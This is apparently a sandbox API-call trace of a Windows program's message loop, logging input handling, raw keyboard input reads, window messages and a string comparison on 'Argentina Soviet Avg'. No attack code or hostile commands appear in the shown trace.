[0224.076] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0224.076] GetTickCount () returned 0x3d1cf [0224.076] GetTickCount () returned 0x3d1cf [0224.076] GetTickCount () returned 0x3d1cf [0224.076] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0224.076] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0224.076] WaitMessage () returned 1 [0224.078] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.078] IsWindow (hWnd=0x50276) returned 1 [0224.078] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.078] GetParent (hWnd=0x50276) returned 0x0 [0224.078] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.078] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.078] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x4, lParam=0x1018e) returned 0x0 [0224.078] GetLastError () returned 0x0 [0224.078] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0224.078] GetTickCount () returned 0x3d1cf [0224.078] GetTickCount () returned 0x3d1cf [0224.078] GetTickCount () returned 0x3d1cf [0224.078] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0224.078] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0224.078] WaitMessage () returned 1 [0224.086] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.086] IsWindow (hWnd=0x50276) returned 1 [0224.086] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.086] GetParent (hWnd=0x50276) returned 0x0 [0224.086] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.086] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.086] GetRawInputData (in: hRawInput=0x200265, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0224.086] GetLastError () returned 0x0 [0224.086] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x200265) returned 0x0 [0224.086] GetLastError () returned 0x0 [0224.086] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0224.087] GetTickCount () returned 0x3d1de [0224.087] GetTickCount () returned 0x3d1de [0224.087] GetTickCount () returned 0x3d1de [0224.087] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0224.087] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0224.087] WaitMessage () returned 1 [0224.098] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.098] IsWindow (hWnd=0x50276) returned 1 [0224.098] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.098] GetParent (hWnd=0x50276) returned 0x0 [0224.098] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.098] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.098] GetRawInputData (in: hRawInput=0x1402cf, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0224.098] GetLastError () returned 0x0 [0224.098] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x1402cf) returned 0x0 [0224.098] GetLastError () returned 0x0 [0224.099] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0224.099] GetTickCount () returned 0x3d1ee [0224.099] GetTickCount () returned 0x3d1ee [0224.099] GetTickCount () returned 0x3d1ee [0224.099] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0224.099] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0224.099] WaitMessage () returned 1 [0224.106] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.106] IsWindow (hWnd=0x50276) returned 1 [0224.106] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.106] GetParent (hWnd=0x50276) returned 0x0 [0224.106] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.106] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.106] GetRawInputData (in: hRawInput=0x210265, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0224.106] GetLastError () returned 0x0 [0224.106] PostMessageA (hWnd=0x50276, Msg=0x290, wParam=0x12, lParam=0x0) returned 1 [0224.106] GetLastError () returned 0x0 [0224.106] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x210265) returned 0x0 [0224.106] GetLastError () returned 0x0 [0224.106] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.106] IsWindow (hWnd=0x50276) returned 1 [0224.107] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.107] GetParent (hWnd=0x50276) returned 0x0 [0224.107] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.107] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.107] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x290, wParam=0x12, lParam=0x0) returned 0x0 [0224.107] GetLastError () returned 0x0 [0224.107] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.107] IsWindow (hWnd=0x50276) returned 1 [0224.107] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.107] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.107] GetParent (hWnd=0x50276) returned 0x0 [0224.107] TranslateMessage (lpMsg=0x30fb80) returned 1 [0224.107] DispatchMessageA (lpMsg=0x30fb80) returned 0x1 [0224.107] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x100, wParam=0x12, lParam=0x0) returned 0x1 [0224.107] GetLastError () returned 0x0 [0224.107] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0224.107] GetTickCount () returned 0x3d1ee [0224.107] GetTickCount () returned 0x3d1ee [0224.107] GetTickCount () returned 0x3d1ee [0224.107] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0224.107] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0224.107] WaitMessage () returned 1 [0224.118] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.118] IsWindow (hWnd=0x50276) returned 1 [0224.118] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.118] GetParent (hWnd=0x50276) returned 0x0 [0224.118] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.118] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.118] GetRawInputData (in: hRawInput=0x220265, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0224.118] GetLastError () returned 0x0 [0224.118] PostMessageA (hWnd=0x50276, Msg=0x290, wParam=0x20, lParam=0x0) returned 1 [0224.118] GetLastError () returned 0x0 [0224.118] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x220265) returned 0x0 [0224.118] GetLastError () returned 0x0 [0224.118] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.119] IsWindow (hWnd=0x50276) returned 1 [0224.119] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.119] GetParent (hWnd=0x50276) returned 0x0 [0224.119] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.119] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.119] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x290, wParam=0x20, lParam=0x0) returned 0x0 [0224.119] GetLastError () returned 0x0 [0224.119] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.119] IsWindow (hWnd=0x50276) returned 1 [0224.119] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.119] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.119] GetParent (hWnd=0x50276) returned 0x0 [0224.119] TranslateMessage (lpMsg=0x30fb80) returned 1 [0224.119] DispatchMessageA (lpMsg=0x30fb80) returned 0x1 [0224.119] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x100, wParam=0x20, lParam=0x0) returned 0x1 [0224.119] GetLastError () returned 0x0 [0224.119] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.119] IsWindow (hWnd=0x50276) returned 1 [0224.119] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.119] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.119] GetParent (hWnd=0x50276) returned 0x0 [0224.119] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.119] DispatchMessageA (lpMsg=0x30fb80) returned 0x1 [0224.119] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x102, wParam=0x20, lParam=0x0) returned 0x1 [0224.124] GetLastError () returned 0x578 [0224.124] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0224.124] GetTickCount () returned 0x3d1fe [0224.124] GetTickCount () returned 0x3d1fe [0224.124] GetTickCount () returned 0x3d1fe [0224.124] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0224.124] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0224.124] WaitMessage () returned 1 [0224.126] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.126] IsWindow (hWnd=0x50276) returned 1 [0224.127] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.127] GetParent (hWnd=0x50276) returned 0x0 [0224.127] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.127] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.127] GetRawInputData (in: hRawInput=0x230265, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0224.127] GetLastError () returned 0x0 [0224.127] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x230265) returned 0x0 [0224.127] GetLastError () returned 0x0 [0224.127] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0224.127] GetTickCount () returned 0x3d20d [0224.127] GetTickCount () returned 0x3d20d [0224.127] GetTickCount () returned 0x3d20d [0224.127] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0224.127] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0224.127] WaitMessage () returned 1 [0224.138] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.138] IsWindow (hWnd=0x50276) returned 1 [0224.138] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.138] GetParent (hWnd=0x50276) returned 0x0 [0224.138] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.138] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.138] GetRawInputData (in: hRawInput=0x1502cf, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0224.138] GetLastError () returned 0x0 [0224.138] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x1502cf) returned 0x0 [0224.138] GetLastError () returned 0x0 [0224.138] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0224.138] GetTickCount () returned 0x3d20d [0224.138] GetTickCount () returned 0x3d20d [0224.138] GetTickCount () returned 0x3d20d [0224.138] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0224.139] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0224.139] WaitMessage () returned 1 [0224.146] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.146] IsWindow (hWnd=0x50276) returned 1 [0224.146] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.146] GetParent (hWnd=0x50276) returned 0x0 [0224.146] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.146] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.146] GetRawInputData (in: hRawInput=0x240265, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0224.146] GetLastError () returned 0x0 [0224.146] PostMessageA (hWnd=0x50276, Msg=0x290, wParam=0xd, lParam=0x0) returned 1 [0224.146] GetLastError () returned 0x0 [0224.146] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x240265) returned 0x0 [0224.146] GetLastError () returned 0x0 [0224.147] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.147] IsWindow (hWnd=0x50276) returned 1 [0224.147] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.147] GetParent (hWnd=0x50276) returned 0x0 [0224.147] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.147] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.147] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x290, wParam=0xd, lParam=0x0) returned 0x0 [0224.147] GetLastError () returned 0x0 [0224.147] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.147] IsWindow (hWnd=0x50276) returned 1 [0224.147] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.147] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.147] GetParent (hWnd=0x50276) returned 0x0 [0224.147] TranslateMessage (lpMsg=0x30fb80) returned 1 [0224.147] DispatchMessageA (lpMsg=0x30fb80) returned 0x1 [0224.147] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x100, wParam=0xd, lParam=0x0) returned 0x1 [0224.147] GetLastError () returned 0x0 [0224.147] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.147] IsWindow (hWnd=0x50276) returned 1 [0224.148] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.148] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.148] GetParent (hWnd=0x50276) returned 0x0 [0224.148] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.148] DispatchMessageA (lpMsg=0x30fb80) returned 0x1 [0224.148] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x102, wParam=0xd, lParam=0x0) returned 0x1 [0224.148] GetLastError () returned 0x578 [0224.148] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0224.148] GetTickCount () returned 0x3d21d [0224.148] GetTickCount () returned 0x3d21d [0224.148] GetTickCount () returned 0x3d21d [0224.148] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0224.148] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0224.148] WaitMessage () returned 1 [0224.155] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.155] IsWindow (hWnd=0x50276) returned 1 [0224.155] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.155] GetParent (hWnd=0x50276) returned 0x0 [0224.155] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.155] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.155] GetRawInputData (in: hRawInput=0x250265, uiCommand=0x10000003, pData=0x30f8f0, pcbSize=0x30f920, cbSizeHeader=0x10 | out: pData=0x30f8f0, pcbSize=0x30f920) returned 0x20 [0224.155] GetLastError () returned 0x0 [0224.155] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xff, wParam=0x1, lParam=0x250265) returned 0x0 [0224.155] GetLastError () returned 0x0 [0224.155] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0224.155] GetTickCount () returned 0x3d21d [0224.155] GetTickCount () returned 0x3d21d [0224.155] GetTickCount () returned 0x3d21d [0224.155] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0224.155] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0224.155] WaitMessage () returned 1 [0224.157] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0224.157] IsWindow (hWnd=0x50276) returned 1 [0224.157] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0224.157] GetParent (hWnd=0x50276) returned 0x0 [0224.157] TranslateMessage (lpMsg=0x30fb80) returned 0 [0224.157] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0224.157] SendMessageA (hWnd=0x1018e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x14 [0224.232] GetLastError () returned 0x0 [0224.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30f8a0, cbMultiByte=1, lpWideCharStr=0x6d2614, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0224.232] SysStringLen (param_1="") returned 0x14 [0224.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0224.233] SendMessageA (hWnd=0x1018e, Msg=0xd, wParam=0x15, lParam=0x6d2614) returned 0x14 [0224.233] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x8b, wParam=0x1018e, lParam=0x30f810) returned 0x0 [0224.233] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x5, lParam=0x30f32c) returned 0x0 [0224.233] GetLastError () returned 0x0 [0224.233] GetLastError () returned 0x0 [0224.239] GetLastError () returned 0x0 [0224.239] SysStringByteLen (bstr="牁敧瑮湩⁡潓楶瑥䄠杶") returned 0x14 [0224.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d2614, cbMultiByte=20, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0224.239] VarBstrCmp (bstrLeft="Argentina Soviet Avg", bstrRight="Argentina Soviet Avg", lcid=0x0, dwFlags=0x30001) returned 0x1 [0224.240] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0224.240] GetTickCount () returned 0x3d27a [0224.240] GetTickCount () returned 0x3d27a [0224.240] GetTickCount () returned 0x3d27a [0224.240] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0224.240] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0224.240] WaitMessage () returned 1 [0224.241] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0224.241] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x8b, wParam=0x1018e, lParam=0x30faec) returned 0x0 [0224.241] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc02b, wParam=0x5, lParam=0x30f608) returned 0x0 [0224.241] GetLastError () returned 0x0 [0224.241] GetLastError () returned 0x0 [0224.242] GetTickCount () returned 0x3d27a [0224.242] GetTickCount () returned 0x3d27a [0224.242] GetTickCount () returned 0x3d27a [0224.242] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0224.242] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0224.242] WaitMessage () returned 1 [0225.171] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0225.171] IsWindow (hWnd=0x50276) returned 1 [0225.171] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0225.171] GetParent (hWnd=0x50276) returned 0x0 [0225.171] TranslateMessage (lpMsg=0x30fb80) returned 0 [0225.171] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0225.172] SendMessageA (hWnd=0x1018e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x14 [0225.172] GetLastError () returned 0x0 [0225.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30f8a0, cbMultiByte=1, lpWideCharStr=0x6d2614, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0225.172] SysStringLen (param_1="") returned 0x14 [0225.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0225.172] SendMessageA (hWnd=0x1018e, Msg=0xd, wParam=0x15, lParam=0x6d2614) returned 0x14 [0225.172] GetLastError () returned 0x0 [0225.172] SysStringByteLen (bstr="牁敧瑮湩⁡潓楶瑥䄠杶") returned 0x14 [0225.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d2614, cbMultiByte=20, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0225.173] VarBstrCmp (bstrLeft="Argentina Soviet Avg", bstrRight="Argentina Soviet Avg", lcid=0x0, dwFlags=0x30001) returned 0x1 [0225.173] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0225.173] GetTickCount () returned 0x3d622 [0225.173] GetTickCount () returned 0x3d622 [0225.173] GetTickCount () returned 0x3d622 [0225.173] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0225.173] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0225.173] WaitMessage () returned 1 [0226.185] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0226.185] IsWindow (hWnd=0x50276) returned 1 [0226.185] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0226.185] GetParent (hWnd=0x50276) returned 0x0 [0226.185] TranslateMessage (lpMsg=0x30fb80) returned 0 [0226.185] DispatchMessageA 